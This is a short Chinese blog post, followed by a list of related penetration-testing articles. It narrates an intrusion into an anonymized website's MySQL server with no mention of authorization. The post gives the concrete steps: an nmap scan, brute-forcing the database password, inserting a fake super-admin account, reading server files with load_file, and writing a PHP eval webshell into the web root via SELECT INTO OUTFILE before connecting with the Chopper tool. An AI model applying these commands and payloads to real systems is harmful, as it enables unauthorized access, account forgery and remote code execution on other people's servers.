一次mysql渗透过程

最新推荐文章于 2024-07-05 14:15:23 发布
最新推荐文章于 2024-07-05 14:15:23 发布
阅读量2.9k 收藏 1
点赞数 2
分类专栏: 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/three_fish/article/details/51233976
版权

1 打开目标站点:www.xxx.com

2 注册账号并登录,大概找下注入点,没找到

3 用namp -A -T4 目标站点扫描开放的服务

   发现mysql等

4 猜弱口令 + 字典  对mysql进行了破译  (运气较好,得到了密码)

5 连接到mysql   找到用户表,密码用md5加密,试了几个,解不出来,应该有加随机字符

   于是复制了一个超级管理员,用户名及密码复制之前注册的账号

6  打开网站首页,登录,进入管理界面。没找到上传漏洞,也没发现物理路径。

7  在mysql 中尝试读取文件

    select load_file('c:/windows/php.ini');  结果为null

  于是创建新表

create table datainfo (aaa text);

  尝试读取文件到表中

       load data infile 'php.ini' into table datainfo; 提示D:phpStudy4IISMySQLdatafactoryphp.ini not found

  可以看出是用phpStudy4IIS创建的,于是下载一个phpStudy4IIS研究目录

      select load_file('D:/phpStudy4IIS/tools/phpStudy.ini');  发现网站根目录等

     写入一句话

     select '<?php @eval($_POST[cmd]); ?>' into outfile 'D:/phpStudy4IIS/WWW/include/xx.php';

     用菜刀连接:www.xxx.com/include/xx.php   cmd





盗才生
关注
专栏目录
一次phpmailer漏洞+UDF提权.pdf
03-14
渗透过程中,我们使用了许多工具,包括nmap、ssh、wpscan、mysql、IE、dirsearch、searchsploit、nc、sraps-cane等。这些工具都是渗透测试中不可或缺的工具。 在攻击过程中,我们学习到了许多有价值的知识,包括...
【基础篇】渗透测试之MySQL部分
weixin_44200098的博客
05-21 535
渗透测试需要用到的MySQL基础知识
渗透测试之地基服务篇:服务攻防之数据库Mysql(下)
m0_59598029的博客
07-31 384
渗透测试-地基篇该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西。请注意本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用KaliLinux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,本站及作者概不负责。名言:你对这行的兴趣,决定你在这行的成就!
干货丨渗透测试常用方法总结,大神之笔!_数据库渗透测试
最新发布
2401_84578953的博客
07-05 1217
网络安全产业就像一个江湖,各色人等聚集。相对于欧美国家基础扎实(懂加密、会防护、能挖洞、擅工程)的众多名门正派,我国的人才更多的属于旁门左道(很多白帽子可能会不服气),因此在未来的人才培养和建设上,需要调整结构,鼓励更多的人去做“正向”的、结合“业务”与“数据”、“自动化”的“体系、建设”,才能解人才之渴,真正的为社会全面互联网化提供安全保障。
【kali-漏洞利用】(3.4)Metasploit渗透攻击应用:MySQL渗透过程
08-06 2530
【kali-漏洞利用】应用渗透攻击过程
mysql渗透中的技巧总结
ytuo1223的专栏
10-08 707
mysql渗透中的技巧总结... 目录: 0×00 mysql一般注入(select) 0×01 mysql一般注入(insert、update) 0×02 mysql报错注入 0×03 mysql一般盲注 0×04 mysql时间盲注 0×05 mysql其他注入技巧 0×06 mysql数据库版本特性 0×07 声明 正文: 0×
MySQL数据库渗透及漏洞利用总结
05-09 4217
Mysql数据库是目前世界上使用最为广泛的数据库之一,很多著名公司和站点都使用Mysql作为其数据库支撑,目前很多架构都以Mysql作为数据库管理系统,例如LAMP、和W...
054-倔强的web狗-记一次C-S架构渗透测试.pdf
09-20
渗透测试(Penetration Testing)是一种通过模拟攻击者的行为来评估计算机系统安全性的安全评估方法。它被用来确定系统中的弱点,确认系统的安全措施是否能够防御外部的非法入侵和内部的威胁。C/S架构(Client/...
一次HW目标测试1
08-03
在本次的“HW目标测试1”中,主要涉及了网络安全领域的渗透测试技术,特别是针对Web应用的安全漏洞利用。以下是对测试过程的详细说明: 首先,测试人员通过弱口令(adminqwe123)成功登录到了后台系统,这是一个...
WEB代码审计与渗透测试.pptx
03-23
总的来说,WEB代码审计与渗透测试是一项综合性的安全活动,要求深入理解编程语言特性、熟知常见漏洞类型,以及具备敏锐的逻辑分析能力。通过细致的代码审查和实战测试,我们可以有效提升Web应用程序的安全性,防止...
091-从无回显命令执行到getshell的渗透测试.pdf
09-20
1. 远程命令执行漏洞的识别与利用:文章开始时提到,在一次渗透测试中,发现了一个PHPimap远程命令执行的漏洞点。这是一种常见的安全漏洞,允许攻击者远程执行服务器上的命令。但是,在这种情况下,执行命令后没有...
Mysql数据库渗透及漏洞利用总结
Fly_鹏程万里
07-07 4074
Mysql数据库是目前世界上使用最为广泛的数据库之一,很多著名公司和站点都使用Mysql作为其数据库支撑,目前很多架构都以Mysql作为数据库管理系统,例如LAMP、和WAMP等,在针对网站渗透中,很多都是跟Mysql数据库有关,各种Mysql注入,Mysql提权,Mysql数据库root账号webshell获取等的,但没有一个对Mysql数据库渗透较为全面对总结,针对这种情况我们开展了研究,虽然...
MySQL口令扫描渗透测试攻略
Fly_鹏程万里
07-07 5594
对于MySQL数据库渗透来说,获取其口令至关重要,一般来讲数据库不会提供对外连接,安全严格的将会限制固有IP和本机登录数据库,但渗透就是发现各种例外!抱着研究的目地,将目前市面上主流的7款MySQL口令扫描工具进行实际测试,并给出了实际利用场景的具体命令,在进行渗透测试时,具有较高的参考价值。1.测试环境:Windows 2003 Server +PHP+MySQL5.0.90-community...
渗透测试:MySQL数据库UDF提权详解
Bossfrank的博客
06-30 3045
本文介绍了渗透测试的常规提权方法——MySQL UDF提权。全面详解了UDF、UDF提权原理与提权过程。以vulhub靶机pWnOS2.0为例,详解了提权的过程。读者可根据本文进行复现学习。
Kali-linux渗透攻击应用
2301_77162959的博客
05-17 2451
前面依次介绍了Armitage、MSFCONSOLE和MSFCLI接口的概念及使用。本节将介绍使用MSFCONSOLE工具渗透攻击MySQL数据库服务、PostgreSQL数据库服务、Tomcat服务和PDF文件等。
渗透知识-内网渗透(详细版本)
热门推荐
Jian Sun_的博客
02-11 3万+
1. 内网安全检查/渗透介绍 1.1 攻击思路 有2种思路: 攻击外网服务器,获取外网服务器的权限,接着利用入侵成功的外网服务器作为跳板,攻击内网其他服务器,最后获得敏感数据,并将数据传递到攻击者,看情况安装长期后门,实现长期控制和获得敏感数据的方式; 攻击办公网的系统、办公网电脑、办公网无线等方式,一般是采用社工,实现控制办公电脑,再用获得的办公网数据,可能是内网的各种登录账号和密码,再获取办公网或者生产网的有用数据。 一般内网安全检查使用第一种思路,实际的攻击2种思路结合实现。 1.2 敏感资
实战复盘:内网环境渗透ms-SQL数据库
2401_84466227的博客
05-26 1222
鼠标放到下面蓝色区域,右键选择 as Escaped String,再粘贴到编辑器中,变成如下图所示,需要手工处理一下,对照上副图,下图中删除白底数据,保留蓝底数据,然后删除头尾的引号、斜杠等,使它变成一个标准的二进制格式的字符串,它就是我们抽取的原始sql字符串,然后,复制到后面sql_replace.js截图的第7行。-----表示替换失败。第一个是onLoad(),bettercap运行成功后,会在屏幕上提示:tcp module loader ----------------;
Mysql漏洞注入——万能密码
qq_66985187的博客
03-14 1127
万能密码,mysql绕过验证和web渗透测试
使用Metasploit对MySQL进行渗透测试
渗透测试
06-04 2411
文章目录前言一、db_nmap扫描1 常用nmap参数介绍2 具体过程二、查看版本1 介绍功能2 具体过程三、暴力破解密码1 介绍功能2 具体过程四、收集信息1 枚举数据库信息①介绍功能②具体过程2 导出密码hash①介绍功能②具体过程五、mysql认证漏洞利用1 介绍功能2 具体过程六、Mof提权1 介绍功能2 具体过程总结 前言 本文详细介绍了如何使用metasploit对mysql进行简单渗透测试 一、db_nmap扫描 使用外置和内置的都行,使用metasploit内置的nmap需要启动post
"phpmailer漏洞UDF提权攻击渗透过程详解
本文主要描述了一次PHPMailer漏洞UDF提权的渗透过程。 首先,渗透过程开始于寻找靶机的IP地址。通过漏洞扫描工具如nmap和srap-scan来发现靶机开放的端口以及相关服务。通过这些信息,渗透者可以进一步探索靶机的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值